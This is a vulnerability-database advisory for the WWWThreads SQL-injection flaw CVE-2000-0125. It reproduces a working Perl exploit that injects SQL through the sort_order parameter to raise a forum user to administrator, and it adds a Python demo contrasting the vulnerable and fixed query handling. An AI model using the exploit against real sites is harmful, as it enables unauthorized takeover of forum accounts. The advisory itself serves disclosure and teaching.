WWWThreads SQL Command Input Vulnerability

Vulnerability ID: 1105700    Type: Input validation
Published: 2000-02-03    Updated: 2006-08-07
CVE ID: CVE-2000-0125    CNNVD ID: CNNVD-200002-027
Platform: CGI    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/19741
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200002-027
|Vulnerability details
WWWThreads fails to properly sanitize numeric data and table names passed into SQL queries. A remote attacker can use this to gain elevated privileges on a WWWThreads forum.
|Exploit
source: http://www.securityfocus.com/bid/967/info


WWWThreads is a web bulletin board program that uses an SQL backend. Due to incomplete input validation, it is possible for an attacker to submit SQL commands through forms and manipulate the contents of the database to gain administrator privileges over the database.

There are various ways for a program to ensure that all entries into data fields are interpreted as data and not SQL commands. WWWThreads uses the quote() function to do this on string values, but fails to verify numeric values in a similar manner. Therefore, SQL commands can be passed to WWWThreads via any numeric argument. These commands can be used to update the status of any user to Administrator and change their security level to '100' (the same level as the Administrator). 

#!/usr/bin/perl
# wwwthreads hack by rfp@wiretrip.net
# elevate a user to admin status
#
# by rain forest puppy / rfp@wiretrip.net
use Socket;

#####################################################
# modify these

# can be DNS or IP address
$ip="localhost";

$username="rfp";
# remember to put a '\' before the '$' characters
$passhash="\$1\$V2\$sadklfjasdkfhjaskdjflh";

#####################################################

$parms="Cat=&Username=$username&Oldpass=$passhash".
"&sort_order=5,U_Status%3d'Administrator',U_Security%3d100".
"&display=threaded&view=collapsed&PostsPer=10".
"&Post_Format=top&Preview=on&TextCols=60&TextRows=5&FontSize=0".
"&FontFace=&PictureView=on&PicturePost=off";

$tosend="GET /cgi-bin/wwwthreads/changedisplay.pl?$parms HTTP/1.0\r\n".
"Referer: http://$ip/cgi-bin/wwwthreads/previewpost.pl\r\n\r\n";

print sendraw($tosend);

sub sendraw {
        my ($pstr)=@_; my $target;
        $target= inet_aton($ip) || die("inet_aton problems");
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,80,$target)){
                select(S);              $|=1;
                print $pstr;            my @in=<S>;
                select(STDOUT);         close(S);
                return @in;
        } else { die("Can't connect...\n"); }}
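The quoting gap the advisory describes, as an added example that is not part of the original advisory or of WWWThreads' code: a quote() lookalike protects the string argument while the "numeric" sort_order is interpolated raw, shown next to a version that validates and binds the value. The Users table, its columns, the in-memory SQLite database and the user row are constructed for the demonstration; the sort_order payload is the one from the request above.

```python
import re
import sqlite3

# Model of DBI's quote(): wrap a string in single quotes and double embedded quotes.
def quote(value):
    return "'" + str(value).replace("'", "''") + "'"

# Constructed schema: a single forum user with ordinary privileges.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (U_Username TEXT, U_Status TEXT, "
                 "U_Security INTEGER, sort_order INTEGER)")
    conn.execute("INSERT INTO Users VALUES ('rfp', 'User', 10, 0)")
    conn.commit()
    return conn

def change_display_vulnerable(conn, username, sort_order):
    # The string is quoted, but the numeric argument is pasted into the
    # statement as-is, so whatever the client sends becomes SQL.
    sql = f"UPDATE Users SET sort_order={sort_order} WHERE U_Username={quote(username)}"
    conn.execute(sql)
    conn.commit()

def change_display_fixed(conn, username, sort_order):
    # Reject anything that is not a plain integer, then bind both values
    # as parameters so neither can alter the statement's structure.
    if not re.fullmatch(r"\d+", str(sort_order)):
        raise ValueError("sort_order must be an integer")
    conn.execute("UPDATE Users SET sort_order=? WHERE U_Username=?",
                 (int(sort_order), username))
    conn.commit()

def user_row(conn, username):
    return conn.execute("SELECT U_Status, U_Security, sort_order FROM Users "
                        "WHERE U_Username=?", (username,)).fetchone()

# The sort_order value sent by the request in the advisory above.
PAYLOAD = "5,U_Status='Administrator',U_Security=100"

def demo():
    results = {}
    conn = make_db()
    change_display_vulnerable(conn, "rfp", PAYLOAD)
    results["vulnerable"] = user_row(conn, "rfp")   # ('Administrator', 100, 5)
    conn = make_db()
    try:
        change_display_fixed(conn, "rfp", PAYLOAD)
        results["fixed"] = "accepted"
    except ValueError:
        results["fixed"] = user_row(conn, "rfp")    # ('User', 10, 0): row untouched
    return results
```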
|References

Source: BUGTRAQ
Name: 20000203 RFP2K01 - "How I hacked Packetstorm" (wwwthreads advisory)
Link: http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.LNX.4.10.10002031027120.15921-100000@eight.wiretrip.net
Source: BID
Name: 967
Link: http://www.securityfocus.com/bid/967